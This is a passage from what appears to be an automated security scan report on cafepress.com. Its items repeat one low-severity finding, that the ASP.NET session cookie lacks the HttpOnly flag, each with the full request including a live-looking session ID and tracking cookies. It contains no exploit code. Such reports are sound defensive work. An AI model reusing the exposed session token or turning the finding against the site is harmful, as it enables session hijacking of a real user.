pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.63. http://www.cafepress.com/make/custom-iphone-cases previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-iphone-cases

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-iphone-cases HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.64. http://www.cafepress.com/make/custom-mugs previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-mugs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.65. http://www.cafepress.com/make/custom-stickers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-stickers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.66. http://www.cafepress.com/make/custom-stockings previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-stockings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-stockings HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.67. http://www.cafepress.com/make/custom-t-shirts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-t-shirts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.68. http://www.cafepress.com/make/custom-thermos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-thermos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.69. http://www.cafepress.com/make/custom-water-bottles previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-water-bottles

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.70. http://www.cafepress.com/make/holiday-invitations previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/holiday-invitations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.71. http://www.cafepress.com/make/holiday-photo-cards previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/holiday-photo-cards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
